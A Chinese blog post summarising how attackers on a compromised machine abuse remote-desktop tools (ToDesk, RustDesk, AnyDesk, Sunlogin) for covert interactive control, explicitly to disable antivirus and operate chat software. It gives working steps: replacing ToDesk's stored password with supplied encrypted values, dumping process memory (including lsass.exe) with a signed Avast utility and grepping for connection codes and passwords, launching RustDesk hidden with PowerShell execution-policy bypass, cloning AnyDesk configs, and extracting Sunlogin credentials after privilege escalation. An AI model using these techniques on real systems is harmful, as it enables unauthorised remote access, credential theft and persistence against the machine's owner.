远程desk工具利用总结

博客 分享
0 252
张三
张三 2023-06-01 21:55:44
悬赏:0 积分 收藏

远程desk工具利用总结

在平时打web或者打内网时难免遇到一种情况,就是需要以当前用户身份,通过远程桌面的形式操控主机。已达到退杀软、操控聊天软件以及其他需要交互式的操作,这个时候就需要借助远程桌面软件来操控目标机。

NO.1 Todesk

根据目标软件安装情况有以下两种利用方法

1.目标机已有完整版todesk。

1)改配置文件。

老版本可替换至本地查看密码(此法在最近更新的几个版本中已经失效),新版本只可更改密码。

改C:\Program Files (x86)\ToDesk下conf.ini文件tempAuthPassEx字段

tga5h42d

b219c2a861e176d319b0a4e0463896d4af2a02ed7bc88da794541701b46f1af2fc4a9864ae00772cc8d924a801bdaaa3b47fbd2fa637ac4b

65tu07zr

11a48a2981bfda260f2f1a890a97b2ed9fcb9b48a262d20e3a68f6c56d6790cd910e1618a7747df448922b0cfe16c284728d28864923d3c8

kill进程重启即可。

2)内存读密码

userInfo.jsondevlist_xx.json文件有userid(连接码)

dump内存,搜索连接码,上下几行会有密码

4.3.3以下临时密码为6位数字

2.目标机无todest,安装官方精简版

dump内存 仅测试4.3.3.0
运行精简版(需bypassUAC),dump子进程(主进程为system权限)

AvDump.exe是Avast杀毒软件中自带的一个程序,可用于转储指定进程(lsass.exe)内存数据,它带有Avast杀软数字签名。

AvDump.exe --pid 954 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp

可通过定位被控端版本 4.3.3.0 、主机名、公网ip、系统版本(更准确),来找到相应位置。

*shell快速提取,不一定有效,密码可能在输出的前后两行

设置utf-8

CHCP 65001

1)连接码

shell findstr "20220829" C:\Users\Public\tod.dmp 时间定位

shell findstr "ip地址" C:\Users\Public\tod.dmp ip定位

2)连接密码

主要靠系统版本号定位,具体看连接码定位字符串显示的版本号

shell findstr "19044" C:\Users\Public\tod.dmp

Wi nd ows 规 格  版 本 号  安 装 日 期  操 作 系 统 内 部 版 本  Windows10 专 业 版  21H2  2022 / 7 / 17

通常为8位数,数字字母混合

6

NO.2 Rustdesk

单机版,无需绕UAC,但部分软件操作会提示UAC。
配置文件地址
C:\Users\username\AppData\Roaming\RustDesk\config\RustDesk.toml

使用powershell可以无窗口执行
powershell-executionPolicy bypass Start-Process -WindowStyle hidden -FilePath 'C:/user/rust.exe'
第一次运行rustdesk会生成配置文件,然后结束进程
taskkill/f /t /im rust.exe
在配置文件中添加密码,6位数密码

在内网还可配置直连功能RustDesk2.toml

[options]
direct-server='Y'
direct-access-port='8443'

NO.3 Anydesk

复制本地C:\Users\guoguang\AppData\Roaming\AnyDesk 下四个文件到远程主机上
删除本地文件,重启开启连接

NO.4 向日葵

自从向日葵12.5版本后,原encry_pwd和fastcode字段已经不在配置文件config.ini和注册表HKEY_USERS.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo内
解决方案一
根据分析,上述字段移动至C:\ProgramData\Oray\SunloginClient\sys_config.ini中
此配置文件默认需要SYSTEM权限才可以读取
提权后拿到id和加密后的密码,经测试算法没变,通过现有项目解密即可 https://github.com/wafinfo/Sunflower_get_Password
解决方案二
通过dump内存的方式匹配明文字符串获取,参考: https://red.rizhan.icu/?thread-176.htm
id正则为k[0-9]{8,}
密码正则为>[a-z0-9]{6},每次刷新后密码的均会保存在内存中

posted @ 2023-06-01 21:12  PYkiller  阅读(7)  评论(0编辑  收藏  举报
回帖
    张三

    张三 (王者 段位)

    921 积分 (2)粉丝 (41)源码

     

    温馨提示

    亦奇源码

    最新会员